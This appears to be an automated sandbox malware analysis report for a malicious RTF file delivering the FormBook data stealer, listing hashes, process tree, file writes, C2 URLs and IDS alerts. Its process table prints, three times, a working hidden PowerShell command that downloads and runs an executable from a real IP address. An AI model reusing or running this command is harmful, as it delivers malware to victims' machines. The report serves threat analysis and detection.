File name: | ba4df75c2a5c0e1ae63f40e8e81f4469.doc |
Full analysis: | https://app.any.run/tasks/456f7a21-796b-4847-a3ca-a8661d99d539 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | October 20, 2020, 07:42:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | BA4DF75C2A5C0E1AE63F40E8E81F4469 |
SHA1: | D13FB216D4C18CE70C2E864078B9A67081F9CBE6 |
SHA256: | 329B2BEAB0F04FF3418020363E781756A72D90D9DFEF91D5134F80C8B749C069 |
SSDEEP: | 1536:9XySTvHyjtHv9Yr9ae2o+CKwNR6+vLUSx+3Bjy6mAgaeeVhMDw5wfLu:95lraRDAw5wf6 |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
560 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ba4df75c2a5c0e1ae63f40e8e81f4469.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4072 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/img/images.exe','C:\Users\admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\admin\AppData\Roaming\images.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2268 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 1.0.0.0 | ||||
948 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/img/images.exe','C:\Users\admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\admin\AppData\Roaming\images.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
884 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/img/images.exe','C:\Users\admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\admin\AppData\Roaming\images.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3580 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 1.0.0.0 | ||||
1540 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 1.0.0.0 | ||||
3564 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | images.exe |
User: admin Integrity Level: MEDIUM Description: Exit code: 0 Version: 1.0.0.0 | ||||
576 | "C:\Windows\System32\taskhost.exe" | C:\Windows\System32\taskhost.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Tasks Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2128 | "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 | C:\Windows\system32\verclsid.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Extension CLSID Verification Host Exit code: 3 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4182.tmp.cvr | — | |
MD5:— | SHA256:— | |||
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BE4AD31.png | — | |
MD5:— | SHA256:— | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IML7F8AY2XLHKC4RTSAK.temp | — | |
MD5:— | SHA256:— | |||
948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B5412LBTZZX3O27TE41M.temp | — | |
MD5:— | SHA256:— | |||
884 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQELP6AD3PDJ1XOFQEQM.temp | — | |
MD5:— | SHA256:— | |||
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\images[1].exe | executable | |
MD5:CBA223C7EB666479CBE851705FB4EA70 | SHA256:1172CE21252D6DD71081C038ED118F2E871D52C500A802BFDB29EE1E7F851B4A | |||
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$4df75c2a5c0e1ae63f40e8e81f4469.doc.rtf | pgc | |
MD5:8B435793BCF58F2C1297F47FAF691081 | SHA256:9ACEB034B6DA0C2C7EBEC9CBC75E3983C134F79983A0B4D43E0AFEBE43C2D1AB | |||
948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
884 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d70c0.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
392 | explorer.exe | GET | — | 46.17.172.156:80 | http://www.mc2.works/ri6/?tZ2x=A5BRKEbhZetAy1pwSLSDHISNjY8GYQNd9PKL/wKBBrR0ncuepv45AB/tLH/9SZn9OVqbjA==&Un0l=GTIL2JL8eD8luN | unknown | — | — | malicious |
4072 | powershell.exe | GET | 200 | 23.99.216.59:80 | http://23.99.216.59/img/images.exe | US | executable | 706 Kb | suspicious |
392 | explorer.exe | GET | 301 | 104.18.136.62:80 | http://www.dylanderoger.com/ri6/?tZ2x=bVwNa6CHIdoenlSEPnMAEKgW46q8BvJ8Osr4oo9ZpQnE1pt+KIevZ6mPvCb4Ucqun99ufw==&Un0l=GTIL2JL8eD8luN | US | html | 200 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
392 | explorer.exe | 46.17.172.156:80 | www.mc2.works | — | — | malicious |
4072 | powershell.exe | 23.99.216.59:80 | — | Microsoft Corporation | US | suspicious |
560 | WINWORD.EXE | 23.99.216.59:80 | — | Microsoft Corporation | US | suspicious |
392 | explorer.exe | 104.18.136.62:80 | www.dylanderoger.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.dylanderoger.com |
| malicious |
www.mc2.works |
| malicious |
www.marketingbiz.info |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
560 | WINWORD.EXE | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
560 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
560 | WINWORD.EXE | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
560 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
560 | WINWORD.EXE | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
4072 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
4072 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4072 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4072 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |